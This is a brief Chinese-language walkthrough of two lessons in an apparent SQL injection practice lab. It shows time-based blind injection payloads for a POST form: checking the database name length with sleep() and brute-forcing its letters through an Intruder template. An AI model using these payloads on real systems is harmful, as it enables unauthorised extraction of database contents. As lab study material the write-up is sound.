Less 15
查看标题 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)
直接使用时间盲注
查看数据库名的长度:' and if(length(database())=8,1,sleep(5))--+
发现数据库名长度为8位
接下来我们转到intruder来查看数据库名
' and if(left(database(),1)='§a§' , sleep(3), 1) --+
发现数据库名第一个字母为's'
以此类推,不难发现数据库名为'security'
Less 16
只需要把Less 15中的 ' 改为双引号加括号 ") 就完事了。
不再赘述。